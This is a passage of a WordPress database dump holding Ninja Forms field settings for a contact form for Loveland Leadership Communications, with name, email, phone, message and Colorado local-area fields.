Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:3;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:3;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:24:\"Initiator-Helaine Reiner\";s:5:\"value\";s:24:\"Initiator-Helaine Reiner\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}}'),(8655,166,'field_label','Text','field_label','Text'),(8656,166,'field_key','html_44','field_key','html_44'),(4763,162,'key','select_the_person_you_would_like_to_contact_1613166597727','key','select_the_person_you_would_like_to_contact_1613166597727'),(4764,162,'container_class','one-half','container_class','one-half'),(4765,162,'parent_id','15','parent_id','15'),(4766,163,'objectType','Field','objectType','Field'),(4767,163,'objectDomain','fields','objectDomain','fields'),(4768,163,'editActive','','editActive',''),(4769,163,'order','8','order','8'),(4770,163,'type','textarea','type','textarea'),(4771,163,'label','Enter Your Message Here','label','Enter Your Message Here'),(4772,163,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(4773,163,'label_pos','above','label_pos','above'),(4774,163,'default_value','','default_value',''),(4775,163,'textarea_rte','0','textarea_rte','0'),(4776,163,'textarea_media','0','textarea_media','0'),(4777,163,'disable_rte_mobile','0','disable_rte_mobile','0'),(4778,163,'input_limit','','input_limit',''),(4779,163,'input_limit_type','char','input_limit_type','char'),(4780,163,'calc_auto_include','0','calc_auto_include','0'),(4781,163,'num_sort','0','num_sort','0'),(4782,163,'admin_label','','admin_label',''),(4783,163,'show_help','0','show_help','0'),(4784,163,'help_text','','help_text',''),(4785,163,'show_desc','0','show_desc','0'),(4786,163,'desc_pos','none','desc_pos','none'),(4787,163,'desc_text','','desc_text',''),(4788,163,'element_class','','element_class',''),(4789,163,'required','1','required','1'),(4790,163,'default','','default',''),(4791,163,'key','textarea_138','key','textarea_138'),(4792,163,'placeholder','','placeholder',''),(4793,163,'container_class','','container_class',''),(4794,163,'manual_key','','manual_key',''),(4795,163,'parent_id','15','parent_id','15'),(17510,625,'default','This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.','default','This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.'),(17509,625,'type','html','type','html'),(17508,625,'label','HTML','label','HTML'),(17506,625,'order','9','order','9'),(17507,625,'idAttribute','id','idAttribute','id'),(17505,625,'editActive','','editActive',''),(17504,624,'key','html_1663798083380','key','html_1663798083380'),(17503,624,'element_class','','element_class',''),(17502,624,'container_class','','container_class',''),(4813,165,'objectType','Field','objectType','Field'),(4814,165,'objectDomain','fields','objectDomain','fields'),(4815,165,'editActive','','editActive',''),(4816,165,'order','10','order','10'),(4817,165,'type','submit','type','submit'),(4818,165,'label','Submit','label','Submit'),(4819,165,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(4820,165,'show_help','0','show_help','0'),(4821,165,'help_text','','help_text',''),(4822,165,'show_desc','0','show_desc','0'),(4823,165,'desc_pos','none','desc_pos','none'),(4824,165,'desc_text','','desc_text',''),(4825,165,'processing_label','Processing','processing_label','Processing'),(4826,165,'element_class','','element_class',''),(4827,165,'key','submit_140','key','submit_140'),(4828,165,'container_class','','container_class',''),(4829,165,'parent_id','15','parent_id','15'),(4830,166,'objectType','Field','objectType','Field'),(4831,166,'objectDomain','fields','objectDomain','fields'),(4832,166,'editActive','','editActive',''),(4833,166,'order','1','order','1'),(4834,166,'type','html','type','html'),(4835,166,'label','Text','label','Text'),(4836,166,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(4837,166,'default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Loveland Leadership Communications</span></span></span></strong></span></h3>','default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Loveland Leadership Communications</span></span></span></strong></span></h3>'),(4838,166,'desc_el','div','desc_el','div'),(4839,166,'show_desc','0','show_desc','0'),(4840,166,'desc_pos','none','desc_pos','none'),(4841,166,'desc_text','','desc_text',''),(4842,166,'element_class','','element_class',''),(4843,166,'default','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Loveland Leadership Communications</span></span></span></strong></span></h3>','default','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Loveland Leadership Communications</span></span></span></strong></span></h3>'),(4844,166,'key','html_44','key','html_44'),(4845,166,'container_class','','container_class',''),(4846,166,'parent_id','16','parent_id','16'),(4847,167,'objectType','Field','objectType','Field'),(4848,167,'objectDomain','fields','objectDomain','fields'),(4849,167,'editActive','','editActive',''),(4850,167,'order','2','order','2'),(4851,167,'type','textbox','type','textbox'),(4852,167,'def_id','6','def_id','6'),(4853,167,'label','First Name','label','First Name'),(4854,167,'label_pos','above','label_pos','above'),(4855,167,'mask','','mask',''),(4856,167,'datepicker','0','datepicker','0'),(4857,167,'first_name','1','first_name','1'),(4858,167,'last_name','0','last_name','0'),(4859,167,'from_name','0','from_name','0'),(4860,167,'user_info_field_group','1','user_info_field_group','1'),(4861,167,'show_help','0','show_help','0'),(4862,167,'help_text','','help_text',''),(4863,167,'calc_auto_include','0','calc_auto_include','0'),(4864,167,'calc_option','0','calc_option','0'),(4865,167,'placeholder','','placeholder',''),(4866,167,'user_address_1','','user_address_1',''),(4867,167,'user_address_2','','user_address_2',''),(4868,167,'user_city','','user_city',''),(4869,167,'user_zip','','user_zip',''),(4870,167,'user_phone','','user_phone',''),(4871,167,'user_email','','user_email',''),(4872,167,'disable_input','0','disable_input','0'),(4873,167,'input_limit','','input_limit',''),(4874,167,'input_limit_type','char','input_limit_type','char'),(4875,167,'input_limit_msg','','input_limit_msg',''),(4876,167,'user_state','0','user_state','0'),(4877,167,'autocomplete_off','0','autocomplete_off','0'),(4878,167,'num_sort','0','num_sort','0'),(4879,167,'admin_label','','admin_label',''),(4880,167,'user_info_field_group_name','','user_info_field_group_name',''),(4881,167,'user_info_field_group_custom','','user_info_field_group_custom',''),(4882,167,'show_desc','0','show_desc','0'),(4883,167,'desc_pos','none','desc_pos','none'),(4884,167,'desc_text','','desc_text',''),(4885,167,'element_class','','element_class',''),(4886,167,'required','1','required','1'),(4887,167,'key','textbox_45','key','textbox_45'),(4888,167,'default','','default',''),(4889,167,'container_class','one-half first','container_class','one-half first'),(4890,167,'manual_key','','manual_key',''),(4891,167,'custom_mask','','custom_mask',''),(4892,167,'parent_id','16','parent_id','16'),(4893,168,'objectType','Field','objectType','Field'),(4894,168,'objectDomain','fields','objectDomain','fields'),(4895,168,'editActive','','editActive',''),(4896,168,'order','3','order','3'),(4897,168,'type','lastname','type','lastname'),(4898,168,'def_id','7','def_id','7'),(4899,168,'label','Last Name','label','Last Name'),(4900,168,'label_pos','above','label_pos','above'),(4901,168,'mask','','mask',''),(4902,168,'datepicker','0','datepicker','0'),(4903,168,'first_name','0','first_name','0'),(4904,168,'from_name','0','from_name','0'),(4905,168,'user_info_field_group','1','user_info_field_group','1'),(4906,168,'show_help','0','show_help','0'),(4907,168,'help_text','','help_text',''),(4908,168,'calc_auto_include','0','calc_auto_include','0'),(4909,168,'calc_option','0','calc_option','0'),(4910,168,'placeholder','','placeholder',''),(4911,168,'user_address_1','','user_address_1',''),(4912,168,'user_address_2','','user_address_2',''),(4913,168,'user_city','','user_city',''),(4914,168,'user_zip','','user_zip',''),(4915,168,'user_phone','','user_phone',''),(4916,168,'user_email','','user_email',''),(4917,168,'disable_input','0','disable_input','0'),(4918,168,'input_limit','','input_limit',''),(4919,168,'input_limit_type','char','input_limit_type','char'),(4920,168,'input_limit_msg','','input_limit_msg',''),(4921,168,'user_state','0','user_state','0'),(4922,168,'autocomplete_off','0','autocomplete_off','0'),(4923,168,'num_sort','0','num_sort','0'),(4924,168,'admin_label','','admin_label',''),(4925,168,'user_info_field_group_name','','user_info_field_group_name',''),(4926,168,'user_info_field_group_custom','','user_info_field_group_custom',''),(4927,168,'show_desc','0','show_desc','0'),(4928,168,'desc_pos','none','desc_pos','none'),(4929,168,'desc_text','','desc_text',''),(4930,168,'element_class','','element_class',''),(4931,168,'required','1','required','1'),(4932,168,'key','lastname_46','key','lastname_46'),(4933,168,'default','','default',''),(4934,168,'container_class','one-half','container_class','one-half'),(4935,168,'parent_id','16','parent_id','16'),(4936,169,'objectType','Field','objectType','Field'),(4937,169,'objectDomain','fields','objectDomain','fields'),(4938,169,'editActive','','editActive',''),(4939,169,'order','4','order','4'),(4940,169,'type','email','type','email'),(4941,169,'def_id','14','def_id','14'),(4942,169,'label','Email','label','Email'),(4943,169,'label_pos','above','label_pos','above'),(4944,169,'mask','','mask',''),(4945,169,'datepicker','0','datepicker','0'),(4946,169,'first_name','0','first_name','0'),(4947,169,'last_name','0','last_name','0'),(4948,169,'from_name','0','from_name','0'),(4949,169,'user_address_1','0','user_address_1','0'),(4950,169,'user_address_2','0','user_address_2','0'),(4951,169,'user_city','0','user_city','0'),(4952,169,'user_zip','0','user_zip','0'),(4953,169,'user_phone','0','user_phone','0'),(4954,169,'user_info_field_group','1','user_info_field_group','1'),(4955,169,'show_help','0','show_help','0'),(4956,169,'help_text','','help_text',''),(4957,169,'calc_auto_include','0','calc_auto_include','0'),(4958,169,'calc_option','0','calc_option','0'),(4959,169,'placeholder','','placeholder',''),(4960,169,'disable_input','0','disable_input','0'),(4961,169,'input_limit','','input_limit',''),(4962,169,'input_limit_type','char','input_limit_type','char'),(4963,169,'input_limit_msg','','input_limit_msg',''),(4964,169,'user_state','0','user_state','0'),(4965,169,'autocomplete_off','0','autocomplete_off','0'),(4966,169,'num_sort','0','num_sort','0'),(4967,169,'admin_label','','admin_label',''),(4968,169,'user_info_field_group_name','','user_info_field_group_name',''),(4969,169,'user_info_field_group_custom','','user_info_field_group_custom',''),(4970,169,'show_desc','0','show_desc','0'),(4971,169,'desc_pos','none','desc_pos','none'),(4972,169,'desc_text','','desc_text',''),(4973,169,'element_class','','element_class',''),(4974,169,'required','1','required','1'),(4975,169,'key','email_47','key','email_47'),(4976,169,'default','','default',''),(4977,169,'container_class','one-half first','container_class','one-half first'),(4978,169,'parent_id','16','parent_id','16'),(4979,170,'objectType','Field','objectType','Field'),(4980,170,'objectDomain','fields','objectDomain','fields'),(4981,170,'editActive','','editActive',''),(4982,170,'order','5','order','5'),(4983,170,'type','phone','type','phone'),(4984,170,'def_id','15','def_id','15'),(4985,170,'label','Phone','label','Phone'),(4986,170,'label_pos','above','label_pos','above'),(4987,170,'mask','(999) 999-9999','mask','(999) 999-9999'),(4988,170,'datepicker','0','datepicker','0'),(4989,170,'first_name','0','first_name','0'),(4990,170,'last_name','0','last_name','0'),(4991,170,'from_name','0','from_name','0'),(4992,170,'user_address_1','0','user_address_1','0'),(4993,170,'user_address_2','0','user_address_2','0'),(4994,170,'user_city','0','user_city','0'),(4995,170,'user_zip','0','user_zip','0'),(4996,170,'user_email','0','user_email','0'),(4997,170,'user_info_field_group','1','user_info_field_group','1'),(4998,170,'show_help','0','show_help','0'),(4999,170,'help_text','','help_text',''),(5000,170,'calc_auto_include','0','calc_auto_include','0'),(5001,170,'calc_option','0','calc_option','0'),(5002,170,'placeholder','','placeholder',''),(5003,170,'disable_input','0','disable_input','0'),(5004,170,'input_limit','','input_limit',''),(5005,170,'input_limit_type','char','input_limit_type','char'),(5006,170,'input_limit_msg','','input_limit_msg',''),(5007,170,'user_state','0','user_state','0'),(5008,170,'autocomplete_off','0','autocomplete_off','0'),(5009,170,'num_sort','0','num_sort','0'),(5010,170,'admin_label','','admin_label',''),(5011,170,'user_info_field_group_name','','user_info_field_group_name',''),(5012,170,'user_info_field_group_custom','','user_info_field_group_custom',''),(5013,170,'show_desc','0','show_desc','0'),(5014,170,'desc_pos','none','desc_pos','none'),(5015,170,'desc_text','','desc_text',''),(5016,170,'element_class','','element_class',''),(5017,170,'required','1','required','1'),(5018,170,'key','phone_48','key','phone_48'),(5019,170,'default','','default',''),(5020,170,'container_class','one-half','container_class','one-half'),(5021,170,'manual_key','','manual_key',''),(5022,170,'custom_mask','','custom_mask',''),(5023,170,'parent_id','16','parent_id','16'),(5024,171,'objectType','Field','objectType','Field'),(5025,171,'objectDomain','fields','objectDomain','fields'),(5026,171,'editActive','','editActive',''),(5027,171,'order','6','order','6'),(5028,171,'type','listselect','type','listselect'),(5029,171,'label','Your Local Area','label','Your Local Area'),(5030,171,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(5031,171,'label_pos','above','label_pos','above'),(5032,171,'list_type','dropdown','list_type','dropdown'),(5033,171,'multi_size','5','multi_size','5'),(5034,171,'list_show_value','1','list_show_value','1'),(5035,171,'list','a:0:{}','list','a:0:{}'),(5036,171,'user_info_field_group','','user_info_field_group',''),(5037,171,'calc_auto_include','0','calc_auto_include','0'),(5038,171,'user_state','0','user_state','0'),(5039,171,'num_sort','0','num_sort','0'),(5040,171,'admin_label','','admin_label',''),(5041,171,'show_help','0','show_help','0'),(5042,171,'help_text','','help_text',''),(5043,171,'show_desc','0','show_desc','0'),(5044,171,'desc_pos','none','desc_pos','none'),(5045,171,'desc_text','','desc_text',''),(5046,171,'element_class','','element_class',''),(5047,171,'required','1','required','1'),(5048,171,'options','a:7:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Boulder\";s:5:\"value\";s:7:\"Boulder\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Co Springs\";s:5:\"value\";s:10:\"Co Springs\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Denver\";s:5:\"value\";s:6:\"Denver\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Loveland\";s:5:\"value\";s:8:\"Loveland\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Western Slope\";s:5:\"value\";s:13:\"Western Slope\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:8:\"selected\";s:1:\"0\";s:5:\"label\";s:5:\"Other\";s:5:\"value\";s:5:\"Other\";s:4:\"calc\";s:0:\"\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}','options','a:7:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> 